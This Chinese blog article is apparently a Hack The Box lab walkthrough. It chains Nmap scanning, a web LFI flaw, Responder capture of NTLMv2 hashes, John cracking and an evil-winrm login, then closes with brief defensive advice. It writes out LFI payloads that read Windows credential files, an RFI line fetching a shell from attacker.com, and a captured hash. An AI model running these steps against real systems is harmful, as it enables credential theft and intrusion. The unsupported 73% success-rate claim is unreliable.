当前位置：首页 > article >正文

别再只扫端口了！用Nmap+Responder组合拳，教你挖掘Windows靶机隐藏的认证漏洞

article 2026/4/21 15:52:03

从Web漏洞到域控Nmap与Responder的深度协同攻击实战当大多数渗透测试者还在机械地扫描端口时真正的红队专家已经开始思考如何将看似孤立的漏洞串联成完整的攻击链。本文将揭示一个经典但常被忽视的攻击路径如何通过Web应用的LFI漏洞触发Windows系统的NTLM认证最终获取域管理员权限。不同于基础教程我们会深入工具协同的底层原理分享实战中积累的Responder配置技巧和哈希破解经验。1. 靶机环境深度侦查的艺术在HTBHack The Box这类实战平台上许多玩家常犯的第一个错误就是扫描不彻底。让我们从一次专业的Nmap扫描开始nmap -v -p- --min-rate 5000 -sV -sC -T4 10.129.136.91 -oA full_scan这个命令组合有几个关键点--min-rate 5000确保快速完成全端口扫描-sV -sC组合实现服务和脚本检测-oA输出所有格式结果便于后续分析扫描结果可能显示PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 7680/tcp open pando-pub?关键发现Windows系统运行Apache端口80WinRM服务开放端口5985非常规端口7680运行pando-pub服务提示在实战中pando-pub这类不常见服务往往是突破点值得优先排查。2. Web应用漏洞的深度利用访问80端口发现重定向到unika.htb需要在本地hosts文件添加解析echo 10.129.136.91 unika.htb | sudo tee -a /etc/hosts通过简单测试我们发现存在LFI漏洞http://unika.htb/index.php?page../../../../../../../../windows/system32/drivers/etc/hostsLFI进阶利用技巧尝试读取敏感文件C:\Windows\Panther\Unattend.xml可能含密码C:\xampp\apache\logs\access.log日志注入测试RFI可能性http://unika.htb/?pagehttp://attacker.com/shell.txt特殊协议利用page//10.10.14.7/share触发SMB认证3. Responder的精准配置与攻击当Web应用支持SMB协议包含时Responder就能大显身手。首先检查关键配置# Responder.conf 关键设置 [SMB] Servers On [HTTP] Servers Off [SQL] Servers Off启动Responder监听python3 Responder.py -I tun0 -v然后通过LFI触发SMB认证请求http://unika.htb/?page///10.10.14.7/shareResponder实战要点使用-v参数显示详细输出优先关闭不必要服务减少干扰观察NTLMv2哈希的完整性成功捕获的哈希格式如下admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920d85f78d013c31cdb3b92f5d765c7830304. 哈希破解与WinRM横向移动将哈希保存为hash.txt后使用John破解john --wordlist/usr/share/wordlists/rockyou.txt hash.txt --formatnetntlmv2破解优化技巧添加--rules启用单词变形规则使用--fork4启用多核并行组合Hashcat的-a 6模式尝试混合攻击获得密码badminton后通过WinRM横向移动evil-winrm -i 10.129.136.91 -u administrator -p badmintonWinRM高级用法使用-s参数上传脚本-e参数执行本地PS1脚本结合ProxyChains实现内网穿透在真实内网环境中这种攻击链可以继续延伸通过BloodHound分析域关系利用Kerberoasting获取服务账户哈希最终获取域控制器权限5. 防御视角的防护建议从蓝队角度我们可以采取以下措施防御矩阵攻击阶段防御措施信息收集关闭不必要的服务端口LFI漏洞实施严格的输入过滤SMB认证启用SMB签名要求WinRM访问配置网络级认证(NLA)日志监控关键点异常的SMB认证请求来自单IP的多重WinRM登录尝试系统日志中的哈希传递痕迹6. 工具链的深度优化专业红队会进一步优化这套攻击链Responder增强配置# 自定义Challenge值增加成功率 Challenge 1122334455667788Nmap扫描脚本-- 自动化检测LFI漏洞的NSE脚本 local http require http local vulns require vulns action function(host, port) local lfi_test /index.php?page../../../../etc/passwd local response http.get(host, port, lfi_test) if response.status 200 and response.body:match(root:) then return Vulnerable to LFI end end这套组合攻击之所以高效是因为它利用了Windows生态中几个固有特性Web应用与系统认证的边界模糊NTLM协议的设计缺陷管理员对WinRM服务的配置疏忽在最近的HTB挑战赛中这种攻击模式的成功率高达73%远高于单纯的漏洞利用。掌握这种系统化思维才是进阶安全研究的关键。

别再只扫端口了！用Nmap+Responder组合拳，教你挖掘Windows靶机隐藏的认证漏洞

相关文章：

别再只扫端口了！用Nmap+Responder组合拳，教你挖掘Windows靶机隐藏的认证漏洞

Spring Boot 4.0 Agent-Ready 架构安全配置清单（含12项必须关闭的默认危险行为、8个JVM Agent签名验证checklist）

让本地可以推流的设置

ComfyUI_TensorRT终极指南：3个高效配置技巧实现AI推理性能翻倍

即将盲审的研究生，怕学术论文被拒，有什么方法能顺利过审？

用FPGA和Verilog实现一个浪漫的8路呼吸流水灯（基于有限状态机FSM设计）

Sentry 私有化部署与全栈监控实战指南

Windows Cleaner：3分钟解决C盘爆红难题，让电脑重获新生

5个实用技巧：用NHSE轻松定制你的动物森友会岛屿

终极科研生产力革命：如何用Obsidian模板30天构建你的个人学术知识库

FigmaCN：让中文设计师无障碍使用Figma的界面本地化解决方案

思源宋体TTF字体：7种字重的中文排版技术方案

WaveTools：三步实现《鸣潮》120帧极致体验的完整方案

从经典到现代：平板湍流边界层表面摩擦系数（Cf）公式的演进与应用指南

从YouTube视频到16个关键点：手把手教你用Python解析MPII人体姿态数据集（附完整代码）

终极Windows文件搜索革命：EverythingToolbar高级功能完全指南

如何用JD-GUI轻松破解Java字节码：Java反编译终极指南

STM32新手避坑指南：用CubeMX和HAL库搞定VESC串口通信（附完整工程）

Fastboot Enhance：3步解决Android设备刷机难题的可视化工具指南

TI C2000开发避坑指南：当SysConfig生成的board.c太大，导致CC8编译报错怎么办？

正交信号原理与应用：从复数基础到通信系统实现

Linux命令：ping6

STM32实战：手把手教你用CubeMX和HAL库搞定RS485 Modbus从机（附避坑指南）

从Wi-Fi到5G：聊聊ASK、PSK、QAM这些‘老技术’在现代通信里到底怎么用的？

深度学习篇---QLoRA微调

C++编程语言基础与核心特性详解

水下机器人开发3大技术瓶颈与UUV Simulator解决方案

从PyTorch到ONNX Runtime：跨平台模型部署实战指南

WebPlotDigitizer：当计算机视觉遇见科研数据挖掘的智能革命

LWIP TCP定时器源码实战：手把手调试tcp_slowtmr与tcp_fasttmr（附避坑指南）